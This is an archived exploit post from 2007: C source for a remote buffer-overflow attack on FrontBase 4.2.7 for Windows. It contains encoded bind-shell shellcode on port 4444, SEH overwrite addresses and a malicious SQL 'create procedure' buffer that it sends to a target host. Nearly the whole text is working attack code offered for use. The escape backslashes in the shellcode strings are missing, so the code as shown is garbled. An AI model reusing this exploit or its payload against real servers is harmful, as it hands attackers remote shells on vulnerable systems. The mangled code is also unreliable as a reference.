Home / exploits frontbase427-remote.txt
Posted on 27 March 2007
/* Dreatica-FXP crew * * ---------------------------------------- * Target : Frontbase <= 4.2.7 for Windows * Site : http://www.frontbase.com * Found by : Netragard, L.L.C Advisory * ---------------------------------------- * Exploit date : 25.03.2007 * Exploit writer : Heretic2 (heretic2x@gmail.com) * OS : Windows 2000 SP4 (will add other later) * Crew : Dreatica-FXP * ---------------------------------------- * Info: * The last Windows version of Frontbase that you can found on official site www.frontbase.com * is the 4.2.7d and this version is patched, so the exploit will not work here, i have tested that * exploit on the 4.2.7 version under Windows 2000 SP4 (not patched) and it is working good. * * The exploitation, as said in advisory, of this bug is easy: SEH and EIP overwrite methods. * but in 'real' life the exploitation is more difficult, cause the server allows only alphanumeric * bytes, like: 0x01 0x02 ... 0x7e 0x7f . * other bytes: 0x80 ... 0xff come to server transformed: * 0xEB will transform in two bytes 0xC2 0xAB * 0xFF will transform in two bytes 0xC3 0xBF * and etc... * * so the exploitation become more difficult here, however in one place of buffer i send to the server byte * 0xff, with assumptions that i will get the bytes 0xC3 0xBF and that the buffer will be one byte longer. * * for the correct exploitation i used some code from win32 SEH GetPC project and metasploit for the shellcodes. * * so the exploit is: * send 3115 bytes to server + address to overwrite SEH. * in my case i sent 3114 bytes, cause one 0xff transformed in 2 symbols * * ---------------------------------------- * Compiling: * To compile this exploit you need: * 1. C:usrFrontBaseIncludeFBCAccess copy to exploit folder. * 2. Copy from C:usrFrontBaselib file FBCAccess.lib to your exploit folder. * 3. Select FBCAccess.lib in linker options * 4. Compile. * ---------------------------------------- * Thanks to: * Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." ) * The Metasploit project ( http://metasploit.com ) * win32 SEH GetPC project ( ) * Dreatica-FXP crew ( ) * ---------------------------------------- * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #pragma comment(lib,"ws2_32") #include "FBCAccess/FBCAccess.h" void usage(char * s); void logo(); void prepare_shellcode(unsigned char * fsh, int sh); void make_buffer(char * buf, int itarget, int sh); int validate_args( int port, int sh, int itarget); int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf); // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring); char *optarg; // global argument pointer int optind = 0, opterr; // global argv index // ----------------------------------------------------------------- // ----------------------------------------------------------------- struct { const char *t ; unsigned long ret ; } targets[]= { // we need alphanumeric addreses so this one found in MSVCRT.dll (there are a lot in it) {"Windows 2000 SP4 no patches, MSVCRT.dll", 0x78014c40 },//pop, pop, ret {"Windows 2000 SP4 no pathces, MSVCRT.dll", 0x7803382b },//jmp ebx {NULL, 0x00000000 } }; struct { const char * name; char * shellcode; }shellcodes[]={ {"Spawn bindshell on port 4444", /* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com first jmp instructions replaced by alphanumeric code taken from the win32 SEH GetPC project. */ "x56x54x58x36x33x30x56x58x48x34x39x48x48x48x50x68" "x59x41x41x51x68x5Ax59x59x59x59x41x41x51x51x44x44" "x44x64x33x36x46x46x46x46x54x58x56x6Ax30x50x50x54" "x55x50x50x61x33x30x31x30x38x39x49x49x49x49x49x49" "x49x49x49x49x49x37x49x49x49x49x49x49x51x5ax6ax66" "x58x30x42x31x50x41x42x6bx42x41x76x32x42x42x32x41" "x41x30x41x41x42x58x50x38x42x42x75x38x69x39x6cx52" "x4ax5ax4bx42x6dx68x68x48x79x4bx4fx6bx4fx4bx4fx65" "x30x6cx4bx30x6cx31x34x71x34x4ex6bx42x65x65x6cx6e" "x6bx53x4cx43x35x62x58x55x51x4ax4fx4ex6bx72x6fx54" "x58x6cx4bx51x4fx77x50x53x31x78x6bx43x79x4ex6bx54" "x74x6cx4bx35x51x6ax4ex64x71x6fx30x6ex79x6ex4cx6d" "x54x6fx30x64x34x55x57x4fx31x59x5ax36x6dx36x61x59" "x52x5ax4bx4cx34x37x4bx62x74x47x54x46x48x70x75x4d" "x35x6cx4bx73x6fx64x64x33x31x4ax4bx43x56x4cx4bx44" "x4cx62x6bx6ex6bx63x6fx57x6cx65x51x6ax4bx77x73x56" "x4cx6cx4bx6ex69x62x4cx44x64x45x4cx55x31x6fx33x44" "x71x6bx6bx51x74x4ex6bx53x73x30x30x4ex6bx57x30x34" "x4cx6cx4bx64x30x37x6cx4ex4dx6cx4bx53x70x73x38x73" "x6ex30x68x4cx4ex62x6ex74x4ex38x6cx30x50x79x6fx6a" "x76x51x76x30x53x42x46x72x48x35x63x45x62x33x58x64" "x37x64x33x74x72x43x6fx33x64x4bx4fx78x50x52x48x38" "x4bx7ax4dx4bx4cx57x4bx62x70x69x6fx6ex36x71x4fx6e" "x69x4bx55x33x56x6cx41x4ax4dx76x68x74x42x63x65x51" "x7ax77x72x4bx4fx4ax70x63x58x6ex39x35x59x6bx45x4e" "x4dx30x57x4bx4fx38x56x50x53x50x53x42x73x51x43x70" "x53x70x43x32x73x52x63x76x33x59x6fx6ex30x55x36x33" "x58x76x71x71x4cx63x56x56x33x6ex69x59x71x4ex75x55" "x38x4cx64x55x4ax72x50x6bx77x56x37x4bx4fx4ex36x53" "x5ax56x70x32x71x33x65x69x6fx4ex30x62x48x39x34x4c" "x6dx74x6ex4ax49x63x67x69x6fx79x46x43x63x36x35x6b" "x4fx68x50x35x38x5ax45x70x49x6dx56x70x49x41x47x6b" "x4fx68x56x56x30x41x44x33x64x71x45x69x6fx4ex30x4d" "x43x53x58x5ax47x70x79x6bx76x73x49x41x47x49x6fx4e" "x36x63x65x4bx4fx4ex30x53x56x50x6ax35x34x53x56x41" "x78x61x73x30x6dx4cx49x4bx55x72x4ax72x70x76x39x45" "x79x58x4cx6bx39x59x77x31x7ax67x34x4cx49x49x72x70" "x31x6fx30x6cx33x6fx5ax69x6ex72x62x36x4dx4bx4ex53" "x72x34x6cx6ax33x6ex6dx62x5ax36x58x6cx6bx4cx6bx4e" "x4bx61x78x30x72x6bx4ex6dx63x46x76x4bx4fx44x35x32" "x64x39x6fx38x56x51x4bx70x57x52x72x70x51x32x71x53" "x61x42x4ax43x31x56x31x46x31x70x55x43x61x79x6fx6a" "x70x62x48x6ex4dx59x49x67x75x7ax6ex33x63x39x6fx59" "x46x63x5ax59x6fx4bx4fx76x57x6bx4fx6ax70x4cx4bx61" "x47x59x6cx6bx33x38x44x43x54x49x6fx58x56x36x32x59" "x6fx4ex30x43x58x68x70x4fx7ax54x44x73x6fx71x43x4b" "x4fx4ex36x6bx4fx78x50x66" }, {NULL , NULL } }; // alphanumeric long back jump, using SEH method! char jmptoshellcode[]= // at the time of jump we have in EBX the address where we jumped after SEH exploitation // so we can use it to jump [EBX-0C20] "x56x54x58x36x33x30x56x58x50x50x5fx53x58x66x2dx20" "x0Cx50x59x58x64x33x3fx64x31x38x51x57x64x31x20x6c"; int main(int argc, char **argv) { char temp1[100], temp2[100]; char * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL; char default_remotehost[]="127.0.0.1"; char default_user[]="_SYSTEM"; char default_password[]=""; char default_database[]=""; char default_dbpassword[]=""; int port, itarget, sh; char c; logo(); if(argc<2) { usage(argv[0]); return -1; } // set defaults port=-1; itarget=0; sh=0; // ------------ while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:"))!= EOF) { switch (c) { case 'h': remotehost=optarg; break; case 's': sscanf(optarg, "%d", &sh); sh--; break; case 't': sscanf(optarg, "%d", &itarget); itarget--; break; case 'p': sscanf(optarg, "%d", &port); break; case 'u': user=optarg; break; case 'P': password=optarg; break; case 'd': database=optarg; break; default: usage(argv[0]); return -1; } } if(validate_args( port, sh, itarget)==-1) return -1; if(remotehost == NULL) remotehost=default_remotehost; if(user == NULL) user=default_user; if(password == NULL) password=default_password; if(dbpassword == NULL) dbpassword=default_dbpassword; if(database == NULL) database=default_database; memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); memset(temp1, 'x20' , 58 - strlen(remotehost) -1); printf(" # Host : %s%s# ", remotehost, temp1); if(port!=-1) { sprintf(temp2, "%d", port); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Port : %s%s# ", temp2, temp1); }else { sprintf(temp2, "%s", database); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Database: %s%s# ", temp2, temp1); } sprintf(temp2, "%s", user); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # User : %s%s# ", temp2, temp1); sprintf(temp2, "%s", database); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Database: %s%s# ", temp2, temp1); memset(temp1,0,sizeof(temp1)); memset(temp2,0,sizeof(temp2)); sprintf(temp2, "%s", shellcodes[sh].name ); memset(temp1, 'x20' , 58 - strlen(temp2) -1); printf(" # Shellcde: %s%s# ", temp2, temp1); memset(temp1,0,sizeof(temp1)); memset(temp1, 'x20' , 58 - strlen(targets[itarget].t) -1); printf(" # Target : %s%s# ", targets[itarget].t, temp1); printf(" # ------------------------------------------------------------------- # "); fflush(stdout); char buf[20000]; memset(buf,0,sizeof(buf)); printf("[+] Constructing attacking buffer... "); fflush(stdout); make_buffer((char *)buf,itarget,sh); printf("done "); if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1) { fprintf(stdout, "[-] Cannot exploit server %s ", remotehost); return -1; } return 0; } int validate_args(int port, int sh, int itarget) { int i=0,x=0; for(i=0;shellcodes[i].name;i++)if(i==sh)x=1; if(x==0) { printf("[-] The shellcode number is invalid "); return -1; } x=0; for(i=0;targets[i].t;i++)if(i==itarget)x=1; if(x==0) { printf("[-] The target is invalid "); return -1; } return 1; } void prepare_shellcode( char * fsh, int sh) { memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode)); } void make_buffer(char * buf, int itarget, int sh) { // -=[ prepare shellcode ]=- char * fsh; fsh = (char *) malloc ((strlen(shellcodes[sh].shellcode)+1) ); memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1)); prepare_shellcode(fsh, sh); // ----------------- // -=[ fill buffer here ]=- memset(buf,0,sizeof(buf)); char * cp = buf; // make vulnerable sql92 command to get exploit strcat(buf, "create procedure ""); cp=buf+strlen(buf); // some useless bytes memset(cp, 'A', 7); cp+=strlen((char *)cp); // shellcode memcpy(cp, fsh, strlen(fsh)); cp+=strlen((char *)cp); // fill after shellcode memset(cp, 'A', 3045-strlen(fsh)); cp+=strlen((char *)cp); // alphanumeric long jump to our shellcode at the start of the buffer memcpy(cp, jmptoshellcode, strlen(jmptoshellcode)); cp+=strlen((char *)cp); memset(cp, 'A', 59-strlen(jmptoshellcode)); cp+=strlen((char *)cp); // at this place in stack points EBX and RET will go here, so we need to jmp upper // to prepare alphanumeric long jump *cp++ = 'x74'; // JNE ... at this point JNE will jump cause the last CMP was 'not equal' *cp++ = 'xff'; // this is not alphanumeric , but the server will transform xff -> xC3xBF // so this will give us the JNE C3 and we will jump upper for 59 bytes // where we put a longer jump to our shellcode. This will add one byte more // so we will send not 3115, but 3114 bytes to overwrite SEH. *cp++ = 'x41'; // SEH chain overwrite *cp++ = (char)((targets[itarget].ret ) & 0xff); *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); // end of the sql92 command memcpy(cp, ""() begin end;", strlen(""() begin end;")); // ----------------- } int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf) { FBCDatabaseConnection * fbdc; FBCMetaData *meta; char sesn[]="dreatica-fxp"; if(database!=NULL) port = -1; fbcInitialize(); if (port!=-1) { printf("[+] Connecting to %s:%d ", host, port); fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword); }else { printf("[+] Connecting to %s to database %s ", host, database); fbdc = fbcdcConnectToDatabase(database, host, dbpassword); } if (fbdc == NULL) { printf("[-] Cannot connect to %s ", host); return -1; } char * session_name=sesn; meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user"); if (fbcmdErrorsFound(meta) != 0) { printf("[-] Failed to create session "); FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); char* msgs = fbcemdAllErrorMessages(emd); fbcemdRelease(emd); free(msgs); fbcmdRelease(meta); fbcdcClose(fbdc); fbcdcRelease(fbdc); return -1; } fbcmdRelease(meta); printf("[+] Sending %d bytes of buffer to server, check the shell ", strlen(buf)); // if exploit success, the app will stop here. meta = fbcdcExecuteDirectSQL(fbdc, buf); if (fbcmdErrorsFound(meta) != 0) { printf("[-] Failed to send buffer "); FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); char* msgs = fbcemdAllErrorMessages(emd); fbcemdRelease(emd); free(msgs); fbcmdRelease(meta); fbcdcClose(fbdc); fbcdcRelease(fbdc); return -1; } fbcmdRelease(meta); return 1; } // ----------------------------------------------------------------- // XGetopt.cpp Version 1.2 // ----------------------------------------------------------------- int getopt(int argc, char *argv[], char *optstring) { static char *next = NULL; if (optind == 0) next = NULL; optarg = NULL; if (next == NULL || *next == '�') { if (optind == 0) optind++; if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�') { optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } if (strcmp(argv[optind], "--") == 0) { optind++; optarg = NULL; if (optind < argc) optarg = argv[optind]; return EOF; } next = argv[optind]; next++; // skip past - optind++; } char c = *next++; char *cp = strchr(optstring, c); if (cp == NULL || c == ':') return '?'; cp++; if (*cp == ':') { if (*next != '�') { optarg = next; next = NULL; } else if (optind < argc) { optarg = argv[optind]; optind++; } else { return '?'; } } return c; } // ----------------------------------------------------------------- // ----------------------------------------------------------------- // ----------------------------------------------------------------- void usage(char * s) { printf(" Usage: "); printf(" %s -h <host> -p <port> -s <shellcode> -t <target> -u <user> -p <password> -d <database> -D <dbpassword> ", s); printf(" ----------------------------------------------------------------------- "); printf(" Arguments: "); printf(" "); printf(" -h <host> the host IP to attack "); printf(" -p <port> the port of server (default: -1 ) "); printf(" -s <shellcode> shellcode number (default: 0 ) "); printf(" -t <target> target number (default: 0 ) "); printf(" -t <target> target number (default: 0 ) "); printf(" -u <user> user name of frontbase (default: _SYSTEM) "); printf(" -p <passwrod> user password (default: <blank>) "); printf(" -d <database> database (if port = -1) (default: <blank>) "); printf(" -d <dbpassword> database password (default: <blank>) "); printf(" "); printf(" Shellcodes: "); for(int i=0; shellcodes[i].name!=0;i++) { printf(" %d. %s Size=%d ",i+1,shellcodes[i].name, strlen(shellcodes[i].shellcode)); } printf(" "); printf(" Targets: "); for(int j=0; targets[j].t!=0;j++) { printf(" %d. %s ",j+1,targets[j].t); } printf(" "); printf(" Examples: "); printf(" %s -h 127.0.0.1 -d NewDB ", s); printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1 ", s); printf(" ----------------------------------------------------------------------- "); } void logo() { printf(" ####################################################################### "); printf(" # ____ __ _ ______ __ _____ # "); printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / # "); printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / # "); printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ # "); printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ # "); printf(" # crew # "); printf(" ####################################################################### "); printf(" # Exploit : Frontbase <= 4.2.7 for Windows # "); printf(" # Author : Heretic2 (heretic2x@gmail.com) # "); printf(" # Version : 1.1 # "); printf(" # System : Windows 2000 SP4 # "); printf(" # Date : 25.03.2007 # "); printf(" # ------------------------------------------------------------------- # "); }
